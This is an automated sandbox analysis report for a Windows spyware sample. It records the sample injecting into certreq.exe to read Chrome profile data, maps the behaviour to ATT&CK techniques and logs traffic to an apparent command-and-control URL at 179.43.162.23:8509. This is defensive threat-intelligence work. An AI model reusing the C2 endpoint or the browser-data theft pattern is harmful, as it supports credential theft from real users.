Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\JumpListIconsRecentClosed	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_pjkljhegncpnkpknbcohdijeoejaedia	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Windows Management Instrumentation	Path Interception	11 Process Injection	1 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Process Injection	1 Credentials in Registry	131 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	22 Software Packing	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	47 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
09212399.exe	41%	Virustotal		Browse
09212399.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://discord.com	0%	URL Reputation	safe
https://discord.com	0%	URL Reputation	safe
https://http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-AgentAccept-Encodinggzip	0%	Avira URL Cloud	safe
https://http:///etc/puk.keyMachineGuid	0%	Avira URL Cloud	safe
https://179.43.162.23:8509/c29db42cd4cdbbd4077/favicon.pngkernelbasentdllkernel32GetProcessMitigatio	0%	Avira URL Cloud	safe
https://179.43.162.23:8509/c29db42cd4cdbbd4077/favicon.pngH	0%	Avira URL Cloud	safe
https://179.43.162.23:8509/c29db42cd4cdbbd4077/favicon.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://discord.com	certreq.exe, 00000001.00000003.426281539.0000018823E92000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://179.43.162.23:8509/c29db42cd4cdbbd4077/favicon.png	09212399.exe, 00000000.00000002.381262694.00000000000A1000.00000004.00000010.00020000.00000000.sdmp, 09212399.exe, 00000000.00000003.368127426.0000000002635000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://http:///etc/puk.keyMachineGuid	certreq.exe, 00000001.00000003.413436249.0000018823DBA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.415230877.0000018823DBF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://179.43.162.23:8509/c29db42cd4cdbbd4077/favicon.pngkernelbasentdllkernel32GetProcessMitigatio	09212399.exe, 00000000.00000003.368127426.0000000002635000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-AgentAccept-Encodinggzip	certreq.exe, 00000001.00000003.450923361.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.444650267.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.423142442.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.443304465.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.445666271.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.424137500.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.443537430.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.428558621.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.420232422.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.443833228.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.424761572.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.423901851.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.423640005.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.441677024.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.438459075.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.415743888.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.424370962.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.415743888.0000018823DB1000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.419657256.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.444175695.0000018823E92000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000001.00000003.426281539.0000018823E92000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://discordapp.com	certreq.exe, 00000001.00000003.426281539.0000018823E92000.00000004.00000020.00020000.00000000.sdmp	false		high
https://179.43.162.23:8509/c29db42cd4cdbbd4077/favicon.pngH	09212399.exe, 00000000.00000002.381262694.00000000000A1000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
179.43.162.23	unknown	Panama		51852	PLI-ASCH	false

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	877002
Start date and time:	2023-05-28 10:49:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	09212399.exe
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@5/0@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 45.5% (good quality ratio 44%) Quality average: 86.1% Quality standard deviation: 23.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
179.43.162.23	file.exe	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PLI-ASCH	file.exe	Get hash	malicious	Unknown	Browse	179.43.162.23
	https://sites.google.com/view/meissnerjacquet/	Get hash	malicious	HTMLPhisher	Browse	179.43.180.161
	file_resized.exe	Get hash	malicious	Amadey, Fabookie, Nymaim, PrivateLoader, RedLine, SmokeLoader, Stealc	Browse	179.43.158.2
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	179.43.190.29
	file.exe	Get hash	malicious	Amadey, Djvu, Fabookie, SmokeLoader	Browse	179.43.190.29
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, SmokeLoader, Vidar	Browse	179.43.190.29
	M7R75837.exe	Get hash	malicious	Amadey, Djvu, Fabookie, SmokeLoader, Xmrig	Browse	179.43.190.29
	93786.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	179.43.190.29
	Document.html	Get hash	malicious	HTMLPhisher	Browse	81.17.18.198
	zqGyFbzeiu.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	179.43.190.29
	36013.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	179.43.190.29
	67915.exe	Get hash	malicious	Amadey, Djvu, Fabookie, SmokeLoader	Browse	179.43.190.29
	E-dekont_pdf.exe	Get hash	malicious	FormBook	Browse	81.17.29.148
	84532.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	179.43.190.29
	74984.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	179.43.190.29
	52312.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader	Browse	179.43.190.29
	unpack_CXTMI.exe	Get hash	malicious	Xmrig	Browse	179.43.140.168
	79616.bin.exe	Get hash	malicious	RHADAMANTHYS	Browse	179.43.155.198
	HsGo4Yw9eL.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Stealc	Browse	179.43.190.29
	Update.js	Get hash	malicious	Unknown	Browse	190.211.254.31

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.379104304802616
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	09212399.exe
File size:	503808
MD5:	57dd320eae0fadd155619407c8b5313c
SHA1:	fc2ce4b86d64025dbba19bb84e561a27fcb6ffb3
SHA256:	4a524e63c81e6cf9ab8a86f8de0973ea6a6d0973545867d34eba1b777e238628
SHA512:	23f1e1833a6a52d28cce3b07c726d568c2743b76593e46ba18cd97c7f3f29c262ea3624d7a3f0e745a6f776e0c21421e2a5a7541783fbcf1d31b359843436ddd
SSDEEP:	6144:e1z0CQa13pdiPumUtZVUqkj+VOVGakSEPhVHUk9ZuyxPwF7XgivTtiuy:eV0CQa131t1keBSEPHHUSu5tTtiuy
TLSH:	62B49E0392E53E54E9A68F769E1ED6E8760EF6708F193769311CBB1F08B0172D263B11
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...\|.......\|.......\|...H...EX..k...b.......\|...c...\|...c...\|...c...Richb...................PE..L.....pb...........

File Icon


Icon Hash:	454149454555691d

Static PE Info

General

Entrypoint:	0x404e59
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6270CBC3 [Tue May 3 06:29:23 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2d9ed3462f8a74bfd1231e2e9de56b43

Entrypoint Preview

Instruction
call 00007F2EE0CD8F13h
jmp 00007F2EE0CD45ADh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F2EE0CD4756h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F2EE0CD4780h
test ecx, 00000003h
jne 00007F2EE0CD4721h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F2EE0CD471Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F2EE0CD4764h
test ah, ah
je 00007F2EE0CD4756h
test eax, 00FF0000h
je 00007F2EE0CD4745h
test eax, FF000000h
je 00007F2EE0CD4734h
jmp 00007F2EE0CD46FFh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 004012D8h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5c8b8	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2a4000	0x19398	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2be000	0xddc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1220	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3150	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c37a	0x5c400	False	0.9075256182249323	data	7.890261806957562	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x5e000	0x245844	0x1e00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2a4000	0x19398	0x19400	False	0.37880956064356436	data	4.262404506795837	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2be000	0x3540	0x3600	False	0.21788194444444445	data	2.444805500720407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x2a4730	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x2a55d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x2a5e80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x2a8428	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x2a94d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x2a9988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x2aa830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x2ab0d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x2ab640	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x2adbe8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x2aec90	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x2af618	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x2afae8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x2b0990	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x2b1238	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x2b1900	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x2b1e68	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x2b4410	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x2b54b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x2b5988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x2b6830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x2b70d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x2b7640	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x2b9be8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x2bac90	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x2bb618	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_STRING	0x2bbd20	0x664	data
RT_STRING	0x2bc388	0x59e	data
RT_STRING	0x2bc928	0x29a	data
RT_STRING	0x2bcbc8	0x248	data
RT_STRING	0x2bce10	0x582	data
RT_GROUP_ICON	0x2bba80	0x68	data
RT_GROUP_ICON	0x2a9938	0x4c	data
RT_GROUP_ICON	0x2b5920	0x68	data
RT_GROUP_ICON	0x2afa80	0x68	data
RT_VERSION	0x2bbae8	0x238	data

Imports

DLL	Import
KERNEL32.dll	GetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
USER32.dll	CharLowerBuffA
GDI32.dll	GetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
ADVAPI32.dll	MapGenericMask

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 28, 2023 10:50:04.630919933 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.650755882 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.650926113 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.651165962 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.674498081 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.693221092 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.693255901 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.693388939 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.724514961 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.751171112 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.771742105 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.815829039 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.815866947 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.815884113 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.815896034 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.815908909 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.815922976 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.815941095 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.815958977 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.816119909 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.816183090 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.819185019 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.819215059 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.819232941 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.819246054 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.819405079 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.820241928 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.835942984 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.835977077 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.836178064 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.836520910 CEST	8509	49699	179.43.162.23	192.168.2.3
